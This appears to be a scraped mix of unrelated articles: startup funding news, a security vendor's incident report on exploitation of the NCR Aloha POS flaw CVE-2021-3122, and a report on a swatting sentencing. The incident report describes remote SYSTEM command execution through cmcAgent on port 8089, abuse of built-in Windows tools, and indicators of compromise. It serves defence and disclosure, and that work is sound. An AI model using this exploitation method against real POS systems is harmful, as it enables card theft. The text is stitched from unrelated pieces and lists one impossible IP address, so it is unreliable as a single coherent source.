Payments company Paystone raises $23.8M to help service-based businesses engage with customers

Paystone, a payments and integrated software company, secured another strategic investment this year, this time $23.8 million ($30 million CAD) from Crédit Mutuel Equity, the private equity arm of Crédit Mutuel Alliance Fédérale.

The Canada-based company got its start in 2008 as the payment processing company Zomaron, and rebranded itself as Paystone in 2019. Today it provides electronic payments and customer engagement technology to businesses, particularly those that provide services, CEO Tarique Al-Ansari told TechCrunch.

“Paystone is on a mission to help businesses grow, and we were enthralled by their commitment to that mission and their focus on service-oriented verticals,” said Léa Perge, investor at Crédit Mutuel Equity in Canada, via email.

While most of the company’s peers focus on product companies, Al-Ansari saw how underserved the service side was: their needs are different, and unlike retail, aren’t looking to sell online. Rather, they need an online presence and digital marketing to engage with customers, but their focus is being findable and having content that tells people why they should do business with them.

Paystone provides the marketing through content, help with reviews and with loyalty and rewards programs. However, rather than reward for spending, Paystone rewards for behavior. Refer a friend, get a reward. Write a review, get a reward. Al-Ansari calls it “payments as a benefit.” Referrals and reviews are how businesses become more findable, and the more content that’s out there, the more it helps people consider the business trustworthy, he added.

The new funding gives Canada-based Paystone total funds raised in 2021 of $78.8 million in a mix of debt and equity. It raised $54.9 million in January, funds that were barely touched as of yet, Al-Ansari said.

Though he wasn’t actively seeking new funds, Al-Ansari had been speaking with Crédit Mutuel Equity, which used to be CIC Capital Canada, prior to the pandemic, and their deal was put on hold.

Crédit Mutuel Equity came back with similar interest, and taking into account the kind of talent Paystone wanted to go after and its acquisition strategy — the company has already acquired five companies — Al-Ansari decided to take the additional funds. He said it gives the company options to hire more and double down on building the company, as well as enough capital to look for more acquisitions.

This year, Paystone entered the U.S. market for the first time and will do a proper launch later this year. The company has over 30,000 merchant locations on its platform throughout North America, and Al-Ansari expects that to grow by 5,000 this year. The company has 150 employees currently, and another 50 are expected to come on board by the end of the year.

In addition, Al-Ansari expects growth to accelerate for the rest of the year. The company processes around $6 billion in credit card payments and is on track to bring in $55.7 million in revenue this year. It is cash flow positive, residuals from the company’s origins of being bootstrapped, he said.

“We want to become the go-to destination for service businesses to set up a digital presence to accept payments and provide loyalty and rewards,” Al-Ansari said. “We will do this by solidifying our market position and growing our platform with the tools that customers want.”

 

CVE-2021-3122 | How We Caught a Threat Actor Exploiting NCR POS Zero Day

A guest post by Kyle Pagelow from Tetra Defense

In this post, we describe how our Incident Response team discovered and thwarted a threat actor stealing credit card data by exploiting a zero day RCE (remote code execution) vulnerability in NCR’s Aloha Point of Sale software, widely used in the catering and restaurant industries.

Our investigation led us to discover and report CVE-2021-3122. While Tetra Defense successfully defended the client’s business, removing the threat actor’s access from the client’s network and mitigating the entire infection chain, a large number of other potential victims are readily discoverable, many of whom could be actively exploited today.

According to the vendor, CVE-2021-3122 is a client misconfiguration, and it appears that it is up to each client using Aloha POS to ensure that the server is properly configured and cannot be exploited in the way described in this post.

While we acknowledge NCR’s position, it is also worth pointing out that this “misconfiguration” is widely deployed and known to be actively exploited. Therefore, we urge all NCR Aloha POS users to ensure their Aloha POS configuration follows NCR’s guidelines and to confirm that their POS network has not been compromised in the manner we discuss in detail below.

Point of Ingress | The Threat Actor’s Initial Compromise

NCR’s Aloha POS software is an end to end point of sale system application primarily used by restaurants to take orders, accept credit card payments and manage other sensitive business functions. As is standard practice, our client was running Aloha POS on an isolated private network, with a number of terminals utilizing this network. The only outward bound communication from any endpoint on the network was to the Aloha Back of House (BOH) server.

The Aloha BOH server provides administrative functions for each of the POS terminals and is responsible for all external communications. Primarily, external traffic consists of communication between the BOH server and NCR’s own servers for the purpose of receiving various administrative commands, performing maintenance and updating the POS terminals when required.

Prior to our IR investigation team being brought in, the client’s network appears to have first been compromised in February 2017. BlackPOS, rtPOS, GratefulPOS and PWNPOS were observed on the client’s systems, along with BTCamant ransomware, shortly after the client had installed an MSP provider. While some of the malware infections avoided C2 communications and wrote files out locally to disk, by December 2018 RampagePOS was observed communicating with a C2 at support[.]nesinoder[.]com. This domain was later seen to be associated with Maze ransomware.

In September 2019, the threat actor began utilizing a commercial remote monitoring and management tool (RMM) called screenconnect. The threat actors configured the RMM tool to report to their own C2s and cleverly disguised the DNS to blend in with legitimate traffic to NCR by using the address support-ncr-aloha[.]net.

The threat actor’s next step was to begin installing credit card stealing malware on both the BOH server and terminal endpoints on January 9th, 2020. At this time, malware was pushed to the terminals using a batch script to update the hosts file on each terminal with an entry labelled ‘back’ and the IP address of the BOH server. Since the terminals had no ability to communicate externally, the malware was configured to send encrypted, scraped credit card data to the BOH server over port 1888.

Discovering the BOH RCE Attack Vector

While it’s not surprising that the terminals could have their hosts files manipulated by the BOH server, the attack’s real menace comes from the exploitation of an hitherto unknown vulnerability in the support[.]ncr-aloha[.]net running on the BOH server. While NCR has been at pains to point out that the exploit requires an unsupported configuration, our investigation found that there are hundreds of Aloha BOH servers currently configured in this way and, therefore, vulnerable to attack.

As attack methods, motives, and consequences change daily, our IR investigation team uses SentinelOne Singularity as our constant ongoing endpoint protection and alert method. We deployed SentinelOne on the client’s terminals and BOH servers as part of our emergency incident response effort. This allowed us not only to get full visibility into the threat actor’s TTPs but also alerts at each stage of the ongoing infection. Via the SentinelOne agents and management console, we were able to identify connections from external IP addresses to the Aloha Command Center Agent occurring over port 8089.

SentinelOne Singularity XDR
See how SentinelOne XDR provides end-to-end enterprise visibility, powerful analytics, and automated response across your complete technology stack.

Having rebuilt the entire Aloha POS network, now with SentinelOne installed, we were able to observe how the actor then re-compromised the system. It quickly became apparent that the threat actor was able to connect to the cmcAgent.exe externally and run commands with SYSTEM level privileges.

The SentinelOne agent alerted us as the threat actor dropped an instance of the DoublePulsar backdoor on the BOH server and wrote malware to the screenconnect directory in c:windowstemp. The threat actor used the Eternal Champion exploit from FUZZBUNCH to install the malware.

In addition, we observed the threat actor utilizing other LOLBins such as certutil to download files, the net command to mount shares to public IP addresses, and netsh to open ports on the Windows firewall and expose services such as RDP.

We leveraged the management console’s Deep Visibility feature and found that the malware was using msiexec for the screenconnect MSI to reach out to the attacker’s C2 at support[.]ncr-aloha[.]net.

At this point, we leveraged the SentinelOne remote shell feature to kill off screenconnect and quarantine the cmcAgent.exe. We ran further Deep Visibility queries to prevent the threat actor from further exploitation of the network.

Discovering CVE-2021-3122 and Creating a POC Exploit

Having secured the client’s network, our next task was to understand what vulnerability the threat actor was leveraging to access the Aloha BOH server. Our investigation found that a flaw exists within the NCR Command Center Agent (cmcAgent.exe). Systems that are configured with an internet-facing Command Center Agent display a banner with the hostname of the server and are discoverable through network scanning and banner grabbing. Simple searches can also be conducted through the use of tools such as shodan.io.

The cmcAgent’s RUNCommand function allows for a parameter to be supplied in a specially crafted XML request that can be executed remotely if the server is configured to listen on TCP port 8089 for incoming connections. Passing such a command allows the attacker to execute that command as SYSTEM.

In our POC, we executed a custom command remotely against a virtual machine that had the cmcAgent running. We created several requests and executed cmd.exe, powershell.exe and calc.exe. All processes spawned under the ‘SYSTEM’ user and were running in the background.

Additionally, when connecting to the port, the server will return a response with the hostname of the system as well as other information indicating the system is running Aloha software. This means it is a simple matter to conduct a shodan search for the banner and see which NCR customers have the Command Center Agent publicly exposed.

Responsible Disclosure and Vendor Response

In June of 2020, Tetra contacted the vendor NCR, creators of the Aloha platform in order to responsibly disclose the vulnerability. NCR had indicated the vulnerability is only exploitable if customers are misconfigured and have the CMCagent’s listening port exposed. NCR updated their documentation for the CMCAgent, and added a requirement not to have the CMCAgent internet-facing. Tetra contacted CISA and disclosed the vulnerability in December of 2020. MITRE rated the vulnerability with a CVS of 9.8.

Recommendations and Mitigation

NCR customers are urged to ensure they have updated to the latest available version.

Users running the Aloha POS system in their environment are strongly urged to review their system configuration and prohibit unauthorized hosts from connecting to vulnerable systems.

Users should run an up-to-date security solution such as SentinelOne Singularity across their environment and review security alerts.

Indicators of Compromise

alohaterm.exe    RAMPAGEPOS         9b8cc45f061565f00f9aab34e6fbcec6fae4633f
alohaterm.exe    RAMPAGEPOS         7c7c8ef5877f01011438410a4075e92731c7c51a
ttfmgr.exe       GratefulPOS        2d9b601d09bc1e49c94b316263f96d6ee6e57c54
ALOHAPROXY.EXE   PWNPOS             7899092e973b38988aa472dabf20314f00399233
wnhelp.exe       PWNPOS             b1983db46e0cb4687e4c55b64c4d8d53551877fa
alohas.exe       BlackPOS           1df323c48c8ce95a80d1e3b9c368c7d7eaf395fc
alohae.exe       rtPOS              a3c81c9e3d92c5007ac2ef75451fe007721189c6
IECache11.dll    RAMPAGEPOS         bf6291d67a21c6cef919c8cc3e485b93daf8d71f
IECache32.dll    RAMPAGEPOS         3688ab0e31a2f2a8a2adeb934c1a10738ec0f2d6
RUBTBGBB.EXE     Trojan/Downloader  0894872f398e19051f5a6be1a50c44943e9635e8
d.exe            Double Pulsar      dc11a846e090094fc82d0cc6ca8914d09113658e
e.exe            Eternal Champion   4c5cc3ec6866a2054eb47820b35ad8a7d8982cd2
UCL.DLL          Double Pulsar      4dfde37e5ff0a4b189f0c644b19b20fa63c41fe1
QOXJPZPX.EXE     Downloader         0894872f398e19051f5a6be1a50c44943e9635e8
TASKENG.EXE      Bitcoin Miner      282239c7d8e8606c88b15f7f2c7f30b5ec1b7fd4
SystemIISSec.exe Bitcoin Miner      835c84dba74fdd2564806daf68958d22feaa2225
g.exe            Bitcoin Miner      a067833f67d829241703c9f488d5834c84b096fe
Chromes.exe      Bitcoin Miner      cfe8c611e1a475a60f181005606d4094d1dad8e3
wslog_tblog6.tmp Bitcoin Miner      eea0c3febedd84a0c2d69dfb1fb5a077ca8d320b
wslog_tblog3.tmp Bitcoin Miner      cfe8c611e1a475a60f181005606d4094d1dad8e3
audlodg.exe      Bitcoin Miner      cb3550ca012a39fbf48ad26f3b2bb1d4f8657b2e
TASKENG.EXE      Bitcoin Miner      282239c7d8e8606c88b15f7f2c7f30b5ec1b7fd4
TOMORROW.EXE     Miner installer    43299c2cdc2a0290de05b01ec6d04160bfcef99f

ncr-aloha[.]net         C&C URL
support.ncr-aloha[.]net C&C URL
nesinoder[.]com         C&C URL
Support.nesinoder[.]com C&C URL
data-wire[.]net
185.41.65[.]211         C&C IP
5.34.183[.]20           C&C IP
130.0.237[.]133         C&C IP
47.90.58[.]130          Bitcoin Miner IP
185.56.80[.]118         IP used in RDP
62.20.60[.]242          IP used in RDP
78.465.89[.]74          IP used in RDP

Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

Tailor Brands raises $50M, aims to be one-stop shop for small businesses to launch

Tailor Brands, a startup that automates parts of the branding and marketing process for small businesses, announced Thursday it has raised $50 million in Series C funding.

GoDaddy led the round as a strategic partner and was joined by OurCrowd and existing investors Pitango Growth, Mangrove Capital Partners, Armat Group, Disruptive VC and Whip Media founder Richard Rosenblatt. Tailor Brands has now raised a total of $70 million since its inception in 2015.

“GoDaddy is empowering everyday entrepreneurs around the world by providing all of the help and tools to succeed online,” said Andrew Morbitzer, vice president of corporate development at GoDaddy, in a written statement. “We are excited to invest in Tailor Brands — and its team — as we believe in their vision. Their platform truly helps entrepreneurs start their business quickly and easily with AI-powered logo design and branding services.”

When Tailor Brands, which launched at TechCrunch’s Startup Battlefield in 2014, raised its last round, a $15.5 million Series B, in 2018, the company was focused on AI-driven logo creation.

The company, headquartered in New York and Tel Aviv, is now compiling the components for a one-stop SaaS platform — providing the design, branding and marketing services a small business owner needs to launch and scale operations, and within minutes, Yali Saar, co-founder and CEO of Tailor Brands told TechCrunch.

Over the past year, more users are flocking to Tailor Brands; the company is onboarding some 700,000 new users per month for help in the earliest stages of setting up their business. In fact, the company saw a 27% increase in new business incorporations as the creator and gig economy gained traction in 2020, Saar said.

In addition to the scores of new users, the company crossed 30 million businesses using the platform. At the end of 2019, Tailor Brands started monetizing its offerings and “grew at a staggering rate,” Saar added. The company yielded triple-digit annual growth in revenue.

To support that growth, the new funding will be used on R&D, to double the team and create additional capabilities and functions. There may also be future acquisition opportunities on the table.

Saar said Tailor Brands is at a point where it can begin leveraging the massive amount of data on small businesses it gathers to help them be proactive rather than reactive, turning the platform into a “consultant of sorts” to guide customers through the next steps of their businesses.

“Users are looking for us to provide them with everything, so we are starting to incorporate more products with the goal of creating an ecosystem, like WeChat, where you don’t need to leave the platform at all to manage your business,” Saar said.

 

Sendlane raises $20M to convert shoppers into loyal customers

Sendlane, a San Diego-based multichannel marketing automation platform, announced Thursday it raised $20 million in Series A funding.

Five Elms Capital and others invested in the round to give Sendlane total funding of $23 million since the company was founded in 2018.

Though the company officially started three years ago, co-founder and CEO Jimmy Kim told TechCrunch he began working on the idea back in 2013 with two other co-founders.

They were all email marketers in different lines of business, but had some common ground in that they were all using email tools they didn’t like. The ones they did like came with too big of a price tag for a small business, Kim said. They set out to build their own email marketing automation platform for customers that wanted to do more than email campaigns and newsletters.

When two other companies Kim was involved in exited in 2017, he decided to put both feet into Sendlane to build it into a system that maximized revenue based on insights and integrations.

In late 2018, the company attracted seed funding from Zing Capital and decided in 2019 to pivot into e-commerce. “Based on our personal backgrounds and looking at the customers we worked with, we realized that is what we did best,” Kim said.

Today, more than 1,700 e-commerce companies use Sendlane’s platform to convert more than 100 points of their customers’ data — abandoned carts, which products sell the best and which marketing channel is working — into engaging communications aimed at driving customer loyalty. The company said it can increase revenue for customers between 20% and 40% on average.

The company itself is growing 100% year over year and seeing over $7 million in annual recurring revenue. It currently has 54 employees right now, and Kim expects to be at around 90 by the end of the year and 150 by the end of 2022. Sendlane currently has more than 20 open roles, he said.

That current and potential growth was a driver for Kim to go after the Series A funding. He said Sendlane became profitable last year, which is why it has not raised a lot of money so far. However, as the rapid adoption of e-commerce continues, Kim wants to be ready for the next wave of competition coming in, which he expects in the next year.

He considers companies like ActiveCampaign and Klaviyo to be in line with Sendlane, but says his company’s differentiator is customer service, boasting short wait times and chats that answer questions in less than 15 seconds.

He is also ready to go after the next vision, which is to unify data and insights to create meaningful interactions between customers and retailers.

“We want to start carving out a new space,” Kim added. “We have a ton of new products coming out in the next 12 to 18 months and want to be the single source for customer journey data insights that provides flexibility for your business to grow.”

Two upcoming tools include Audiences, which will unify customer data and provide insights, and an SMS product for two-way communications and enabled campaign-level sending.

 

Ethos picks up $100M at a $2.7B+ valuation for a big data platform to improve life insurance accessibility

More than half of the U.S. population has stayed away from considering life insurance because they believe it’s probably too expensive, and the most common way to buy it today is in person. A startup that’s built a platform that aims to break down those conventions and democratize the process by making life insurance (and the benefits of it) more accessible is today announcing significant funding to fuel its rapidly growing business.

Ethos, which uses more than 300,000 data points online to determine a person’s eligibility for life insurance policies, which are offered as either term or whole life packages starting at $8/month, has picked up $100 million from a single investor, SoftBank Vision Fund 2. Peter Colis, Ethos’s CEO and co-founder, said that the funding brings the startup’s valuation to over $2.7 billion.

This is a quick jump for the company: It was only two months ago that Ethos picked up a $200 million equity round at a valuation of just over $2 billion.

It has now raised $400 million to date and has amassed a very illustrious group of backers. In addition to SoftBank they include General Catalyst, Sequoia Capital, Accel, GV, Jay-Z’s Roc Nation, Glade Brook Capital Partners, Will Smith and Robert Downey Jr.

This latest injection of funding — which will be used to hire more people and continue to expand its product set into adjacent areas of insurance like critical illness coverage — was unsolicited, Colis said, but comes on the heels of very rapid growth.

Ethos — which is sold currently only in the U.S. across 49 states — has seen both revenues and user numbers grow by over 500% compared to a year ago, and it’s on track to issue some $20 billion in life insurance coverage this year. And it is approaching $100 million in annualized growth profit. Ethos itself is not yet profitable, Colis said.

There are a couple of trends going on that speak to a wide opportunity for Ethos at the moment.

The first of these is the current market climate: Globally we are still battling the COVID-19 global health pandemic, and one impact of that — in particular given how COVID-19 has not spared any age group or demographic — has been more awareness of our mortality. That inevitably leads at least some part of the population to considering something like life insurance coverage that might not have thought about it previously.

However, Colis is a little skeptical on the lasting impact of that particular trend. “We saw an initial surge of demand in the COVID period, but then it regressed back to normal,” he said in an interview. Those who were more inclined to think about life insurance around COVID-19 might have come around to considering it regardless: It was being driven, he said, by those with pre-existing health conditions going into the pandemic.

That, interestingly, brings up the second trend, which goes beyond our present circumstances, and Colis believes will have the more lasting impact.

While there have been a number of startups, and even incumbent providers, looking to rethink other areas of insurance such as car, health and property coverage, life insurance has been relatively untouched, especially in some markets like the U.S. Traditionally, someone taking out life insurance goes through a long vetting process, which is not all carried out online and can involve medical examinations and more, and yes, it can be expensive: The stereotype you might best know is that only wealthier people take out life insurance policies.

Much like companies in fintech that have rethought how loan applications (and payback terms) can be rethought and evaluated afresh using big data — pulling in a new range of information to form a picture of the applicant and the likelihood of default or not — Ethos is among the companies that is applying that same concept to a different problem. The end result is a much faster turnaround for applications, a considerably cheaper and more flexible offer (term life insurance lasts only as long as a person pays for it), and generally a lot more accessibility for everyone potentially interested. That pool of data is growing all the time.

“Every month, we get more intelligent,” said Colis.

There is also the matter of what Ethos is actually selling. The company itself is not an insurance provider but an “insuretech” — similar to how neobanks use APIs to integrate banking services that have been built by others, which they then wrap with their own customer service, personalization and more — Ethos integrates with third-party insurance underwriters, providing customer service, more efficient onboarding (no in-person medical exams for example) and personalization (both in packages and pricing) around them. Given how staid and hard it is to get more traditional policies, it’s essentially meant completely open water for Ethos in terms of finding and securing new customers.

Ethos’s rise comes at a time when we are seeing other startups approaching and rethinking life insurance also in the U.S. and further afield. Last week, YuLife in the U.K. raised a big round to further build out its own take on life insurance, which is to sell policies that are linked to an individual’s own health and wellness practices — the idea being that this will make you happier and give more reason to pay for a policy that otherwise feels like some dormant investment; but also that it could help you live longer (Sproutt is another also looking at how to emphasize the “life” aspect of life insurance). Others like  DeadHappy and BIMA are, like Ethos, rethinking accessibility of life insurance for a wider set of demographics.

There are some signs that Ethos is catching on with its mission to expand that pool, not just grow business among the kind of users who might have already been considering and would have taken out life insurance policies. The startup said that more than 40% of its new policy holders in the first half of 2021 had incomes of $60,000 or less, and nearly 40% of new policy holders were under the age of 40. The professions of those customers also speak to that democratization: The top five occupations, it said, were homemaker, insurance agent, business owner, teacher and registered nurse.

That traction is likely one reason why SoftBank came knocking.

“Ethos is leveraging data and its vertically integrated tech stack to fundamentally transform life insurance in the U.S.,” said Munish Varma, managing partner at SoftBank Investment Advisers, in a statement. “Through a fast and user-friendly online application process, the company can accurately underwrite and insure a broad segment of customers quickly. We are excited to partner with Peter Colis and the exceptional team at Ethos.”

Andreessen Horowitz funds Vitally’s $9M round for customer experience software

Customer success company Vitally raised $9 million in Series A funding from Andreessen Horowitz to continue developing its SaaS platform automating customer experiences.

Co-founder and CEO Jamie Davidson got the idea for Vitally while he was at his previous company, Pathgather. As chief customer officer, he was looking at tools and “was underwhelmed” by the available tools to automate repetitive tasks. So he set out to build one.

The global pandemic thrust customer satisfaction into the limelight as brands realized that the same ways they were engaging with customers had to change now that everyone was making the majority of their purchases online. Previously, a customer service representative may have managed a dozen accounts, but nowadays with product-led growth, they tackle a portfolio of thousands of customers, Davidson told TechCrunch.

New York-based Vitally, founded in 2017, unifies all of that customer data into one place and flows it through an engine to provide engagement insights, like what help customers need, which ones are at risk of churning and which to target for expanded revenue opportunities. Its software also provides automation to balance workflow and steer customer success teams to the tasks with the right customers so that they are engaging at the correct time.

Andreessen approached Davidson for the Series A, and he liked the alignment in customer success vision, he said. Including the new funding, Vitally raised a total of $10.6 million, which includes $1.2 million in September 2019.

From the beginning, Vitally was bringing in strong revenue growth, which enabled the company to focus on building its platform and hold off on fundraising.

“A Series A was certainly on our mind and road map, but we weren’t actively fundraising,” Davidson said. “However, we saw a great fit and great backing to help us grow. Tools have lagged in the customer success area and how to manage that. Andreessen can help us scale and grow with our customers as they manage the thousands of their customers.”

Davidson intends to use the new funding to scale Vitally’s team across the board and build out its marketing efforts to introduce the company to the market. He expects to grow to 30 by the end of the year to support the company’s annual revenue growth — averaging 3x — and customer acquisition. Vitally is already working with big customers like Segment, Productboard and Calendly.

As part of the investment, Andreessen general partner David Ulevitch is joining the Vitally board. He saw an opportunity for the reimagining of how SaaS companies delivered customer success, he told TechCrunch via email.

Similar to Davidson, he thought that customer success teams were now instrumental to growing SaaS businesses, but technology lagged behind market need, especially with so many SaaS companies taking a self-serve or product-led approach that attracted more orders than legacy tools.

Before the firm met Vitally, it was hearing “rave reviews” from its customers, Ulevitch said.

“The feedback was overwhelmingly positive and affirmed the fact that Vitally simply had the best product on the market since it actually mapped to how businesses operated and interacted with customers, particularly businesses with a long-tail of paying customers,” he added. “The first dollar into a SaaS company is great, but it’s the renewal and expansion dollars that really set the winners apart from everyone else. Vitally is in the best position to help companies get that renewal, help their customers expand accounts and ultimately win the space.”

 

Yoobic raises $50M for its chat and communications app app aimed at frontline and service workers

Slack set the standard in many ways for what knowledge workers want and expect out of a workplace collaboration app these days, but a lot has been left on the table when it comes to frontline workers. Today, one of the software companies that has built a popular app for that frontline crowd to become a part of the conversation is announcing a funding round that speaks to the opportunity to do more.

Yoobic, which provides an app for frontline and service workers to manage tasks, communicate with each other and management, and also go through training, development and and other e-learning tasks, has picked up $50 million.

Highland Europe led the round, a Series C, with previous investors Felix Capital, Insight Partners, and a family office advised by BNF Capital Limited also participating. (Felix led Yoobic’s Series A, while Insight Partners led the Series B in 2019.) Yoobic is not discussing valuation but from what I understand from a reliable source, it is now between $300 million and $400 million.

The funding comes at a time of strong growth for the company.

Yoobic works with some 300 big brands in 80 countries altogether covering a mammoth 335,000 locations in sectors like retail, hospitality, distribution and manufacturing. Its customers include the likes of the Boots pharmacy chain, Carrefour supermarkets, Lancôme, Lacoste, Logitech, Lidl, Peloton, Puma, Vans, VF Corp, Sanofi, Untuckit, Roots, Canada Goose, Longchamp, Lidl, Zadig & Voltaire, and Athletico.

But that is just the tip of the iceberg. It’s estimated that there are 2.7 billion “deskless” (frontline and service) workers globally, accounting for no less than 80% of the world’s workforce. But here is the shocker: only 1% of IT budgets is currently spent on them. That speaks of huge opportunity for startups to build more here, but only if they (or the workers themselves( can manage to convince those holding the purse strings that it’s worth the investment.

So to that end, the funding will be used to hire more talent, to expand geographically — founded in London, the company is now headquartered in New York — and to expand its product. Specifically, Yoobic plans to build more predictive analytics to improve responsiveness and give more insight to companies about their usage, and to build out more tools to cater to specific verticals in the world of frontline work, such as manufacturing, logistics and transportation, Fabrice Haiat, CEO and co-founder of YOOBIC, told TechCrunch in an interview.

Yoobic started life several years ago with a focus specifically on retail — an area that it was concentrating on as recently as its last round in 2019, providing tools to help with merchandizing, communicating about stock between stores and more. While retail is still a sizeable part of its business, Yoobic saw an opening to expand into a wider pool of verticals with frontline and service employees that had many of the same demands as retail.

That turned out to be a fortunate pivot as the pandemic struck.

“Covid-19 had a big impact on us,” said Haiat, who co-founded the company with brothers Avi and Gilles. “The first two months we were in panic mode. But what happened was that businesses realized that frontline employees were critical to the success of their operations.”

Since Covid hit last year, he said that activity on the platform rose by 200%, and earlier this year it passed 1 million activities per month on its platform. “We are growing like crazy,” Haiat said.

There are a number of reasons why building for frontline workers is important. Roaming round without a fixed desk, spending more time with customers than looking at a screen or in meetings, and generally having different business priorities and practices are just a few of the reasons why software built for the former doesn’t necessarily work for the latter.

There have been a number of companies that have aimed to build services to address that gap — they stretch back years, in fact. And there have been some interesting moves to consolidate in the market among those building some of the more successful tools for people in the field: Crew recently got acquired by Square; ServiceMax acquired Zinc; and Facebook’s Workplace has been on a march to amass some of the world’s biggest companies as customers of its own communications platform with a strong play for frontline workers.

Haiat argues that while all of these are fine and well, none of them understand the full scope of the kinds of tools that those in the field really need. That ranges from practical features (such as a way to handle inventory management), through to features that companies would love to have for their employees as long as they can be delivered in an easy way (such as professional development and training). In that context, the basic communications that all of the current crop of apps for frontline workers offer feel like basic tablestakes.

That close understanding of the gap in the market and what is needed to fix it is one reason why the company has seen such strong growth, as well as interest from investors.

“We’re excited to partner with YOOBIC, which, thanks to the highly impressive team led by Fabrice, Avi and Gilles, has clearly established itself as a leader in the digital workplace space with demonstrable market traction and impressive growth.” said Jean Tardy-Joubert, partner at Highland Europe, in a statement. “While companies have historically focused on digital investments for deskbound employees, the world is becoming distributed and decentralized.  We anticipate a seismic shift that will see huge resources, technology, and capital shifted toward frontline teams.” Tardy-Joubert will be joining the YOOBIC Board with this round.

Serial Swatter Who Caused Death Gets Five Years in Prison

A 18-year-old Tennessee man who helped set in motion a fraudulent distress call to police that led to the death of a 60-year-old grandfather in 2020 was sentenced to 60 months in prison today.

60-year-old Mark Herring died of a heart attack after police surrounded his home in response to a swatting attack.

Shane Sonderman, of Lauderdale County, Tenn. admitted to conspiring with a group of criminals that’s been “swatting” and harassing people for months in a bid to coerce targets into giving up their valuable Twitter and Instagram usernames.

At Sonderman’s sentencing hearing today, prosecutors told the court the defendant and his co-conspirators would text and call targets and their families, posting their personal information online and sending them pizzas and other deliveries of food as a harassment technique.

Other victims of the group told prosecutors their tormentors further harassed them by making false reports of child abuse to social services local to the target’s area, and false reports in the target’s name to local suicide prevention hotlines.

Eventually, when subjects of their harassment refused to sell or give up their Twitter and Instagram usernames, Sonderman and others would swat their targets — or make a false report to authorities in the target’s name with the intention of sending a heavily armed police response to that person’s address.

For weeks throughout March and April 2020, 60-year-old Mark Herring of Bethpage, Tenn. was inundated with text messages asking him to give up his @Tennessee Twitter handle. When he ignored the requests, Sonderman and his buddies began having food delivered to Herring’s home via cash on delivery.

At one point, Sonderman posted Herring’s home address in a Discord chat room used by the group, and a minor in the United Kingdom quickly followed up by directing a swatting attack on Herring’s home.

Ann Billings was dating Mr. Herring and was present when the police surrounded his home. She recalled for the Tennessee court today how her friend died shortly thereafter of a heart attack.

Billings said she first learned of the swatting when a neighbor called and asked why the street was lined with police cars. When Mr. Herring stepped out on the back porch to investigate, police told him to put his hands up and to come to the street.

Unable to disengage a lock on his back fence, Herring was instructed to somehow climb over the fence with his hands up.

“He was starting to get more upset,” Billings recalled. “He said, ‘I’m a 60-year-old fat man and I can’t do that.’”

Billings said Mr. Herring then offered to crawl under a gap in the fence, but when he did so and stood up, he collapsed of a heart attack. Herring died at a nearby hospital soon after.

Mary Frances Herring, who was married to Mr. Herring for 28 years, said her late husband was something of a computer whiz in his early years who secured the @Tennessee Twitter handle shortly after Twitter came online. Internet archivist Jason Scott says Herring was the creator of the successful software products Sparkware and QWIKMail; Scott has 2 hours worth of interviews with Herring from 20 years ago here.

Perhaps the most poignant testimony today came when Ms. Herring said her husband — who was killed by people who wanted to steal his account — had a habit of registering new Instagram usernames as presents for friends and family members who’d just had children.

“If someone was having a baby, he would ask them, ‘What are your naming the baby?’,” Ms. Herring said. “And he would get them that Instagram name and give it to them as a gift.”

Valerie Dozono also was an early adopter of Instagram, securing the two-letter username “VD” for her initials. When Dozono ignored multiple unsolicited offers to buy the account, she and many family and friends started getting unrequested pizza deliveries at all hours.

When Dozono continued to ignore her tormentors, Sonderman and others targeted her with a “SIM-swapping attack,” a scheme in which fraudsters trick or bribe employees at wireless phone companies into redirecting the target’s text messages and phone calls to a device they control. From there, the attackers can reset the password for any online account that allows password resets via SMS.

But it wasn’t the subsequent bomb threat that Sonderman and friends called in to her home that bothered Dozono most. It was the home invasion that was ordered at her address using strangers on social media.

Dozono said Sonderman created an account on Grindr — the location-based social networking and dating app for gay, bi, trans and queer people — and set up a rendezvous at her address with an unsuspecting Grindr user who was instructed to waltz into her home as if he was invited.

“This gentleman was sent to my home thinking someone was there, and he was given instructions to walk into my home,” Dozono said.

The court heard from multiple other victims targeted by Sonderman and friends over a two-year period. Including Shane Glass, who started getting harassed in 2019 over his @Shane Instagram handle. Glass told the court that endless pizza deliveries, as well as SIM swapping and swatting attacks left him paranoid for months that his assailant could be someone stalking him nearby.

Judge Mark Norris said Sonderman’s agreement to plead to one count of extortion by threat of serious injury or damage carries with it a recommended sentence of 27 to 33 months in prison. However, the judge said other actions by the defendant warranted up to 60 months (5 years) in prison.

Sonderman might have been eligible to knock a few months off his sentence had he cooperated with investigators and refrained from committing further crimes while out on bond.

But prosecutors said that shortly after his release, Sonderman went right back to doing what he was doing when he got caught. Investigators who subpoenaed his online communications found he’d logged into the Instagram account “FreeTheSoldiers,” which was known to have been used by the group to harass people for their social media handles.

Sonderman was promptly re-arrested for violating the terms of his release, and prosecutors played for the court today a recording of a phone call Sonderman made from jail in which he brags to a female acquaintance that he wiped his mobile phone two days before investigators served another search warrant on his home.

Sonderman himself read a lengthy statement in which he apologized for his actions, blaming his “addiction” on several psychiatric conditions — including bipolar disorder. While his recitation was initially monotone and practically devoid of emotion, Sonderman eventually broke down in tears that made the rest of his statement difficult to hear over the phone-based conference system the court made available to reporters.

The bipolar diagnoses was confirmed by his mother, who sobbed as she simultaneously begged the court for mercy while saying her son didn’t deserve any.

Judge Norris said he was giving Sonderman the maximum sentenced allowed by law under the statute — 60 months in prison followed by three years of supervised release, but implied that his sentence would be far harsher if the law permitted.

“Although it may seem inadequate, the law is the law,” Norris said. “The harm it caused, the death and destruction….it’s almost unspeakable. This is not like cases we frequently have that involve guns and carjacking and drugs. This is a whole different level of insidious criminal behavior here.”

Sonderman’s sentence pales in comparison to the 20-year prison time handed down in 2019 to serial swatter Tyler Barriss, a California man who admitted making a phony emergency call to police in late 2017 that led to the shooting death of an innocent Kansas resident.

Zenput raises $27M Series C to keep multiunit operations flowing no matter the location

Ensuring food safety compliance can be challenging at one restaurant, let alone across thousands of restaurants. Zenput has developed technology aimed at making sure operating procedures are quickly adapted so that businesses maintain quality.

The San Francisco-based operations execution company raised $27 million in Series C financing, led by Golub Capital, to continue developing its application to automate operation procedures like tracking food safety, public health protocols and changing market conditions.

Restaurants, convenience stores and grocery chain customers can use Zenput to update all of their locations — at the same time — with new processes, promotional campaigns and key initiatives while also gathering data and insights from those locations to find opportunities for improvement.

Joining Golub in the round were existing investors, including Jackson Square Ventures, MHS Capital and Goldcrest Capital. This brings the company’s total funding to more than $47 million, co-founder and CEO Vladik Rikhter told TechCrunch.

